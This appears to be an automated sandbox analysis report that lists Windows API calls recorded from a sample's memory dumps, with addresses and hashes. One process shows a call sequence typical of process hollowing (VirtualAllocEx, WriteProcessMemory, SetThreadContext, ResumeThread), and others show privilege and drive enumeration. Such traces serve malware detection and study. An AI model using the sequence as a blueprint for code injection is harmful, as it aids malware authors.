                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00264D8E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00264360
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00264640
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00264640
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00263BB6
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0026407E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165069549.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165069549.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D5AD37
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D5AD37
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D5B329
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D5B329
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D5A23E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01D5A94A
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D5BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D5AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D5BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01D5A39C
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D5AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D5AA71
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D5ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D5BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D5A23E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D5BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01D5A94A
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D5ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01D5A39C
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D5AA71
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D5A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D5A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2163193388.00000000028B0000.00000040.00000040.sdmp, Offset: 028B0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6ae8cfe6986b422ec64ea904c58e3abb347b565657606c0cc61c18b21a5bbb4
                                                        • Instruction ID: b14711675e552319ed1a857252d4926f023622e9fba0d57d1dab221736ee9c1b
                                                        • Opcode Fuzzy Hash: f6ae8cfe6986b422ec64ea904c58e3abb347b565657606c0cc61c18b21a5bbb4
                                                        • Instruction Fuzzy Hash: 3C01D676509780AFD7118F16AC41863FFA8DE87670709C5AFEC498B612C225A909CB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2173491826.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b096d29f2b31ba83146fb4fd103571dcdc741ee706c69be021304cfe0262883
                                                        • Instruction ID: 9de84bd585ac31886f786a788164fecebcce718f1ef4ef442bdaff20c30c4c94
                                                        • Opcode Fuzzy Hash: 6b096d29f2b31ba83146fb4fd103571dcdc741ee706c69be021304cfe0262883
                                                        • Instruction Fuzzy Hash: 26F0651270D3E15FC70713685CA94557F729D9752134A42D7D582CB1E6D9048C86D376
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2163193388.00000000028B0000.00000040.00000040.sdmp, Offset: 028B0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c07083f1e755692ab285c755832806649fe7446fb2fbb60574b2de790c505ba1
                                                        • Instruction ID: 49705889a4379aea6540d11470326384c36310bb7451f18169c4e78ba8023f5b
                                                        • Opcode Fuzzy Hash: c07083f1e755692ab285c755832806649fe7446fb2fbb60574b2de790c505ba1
                                                        • Instruction Fuzzy Hash: 98E092766047009BD750CF0AEC41452F794EB84A30B18C47FDC0D8B710D136B504CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152503368.0000000001D52000.00000040.00000001.sdmp, Offset: 01D52000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152503368.0000000001D52000.00000040.00000001.sdmp, Offset: 01D52000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F4AD37
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F4AD37
                                                        Memory Dump Source
                                                        • Source File: 00000017.00000002.2156471783.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
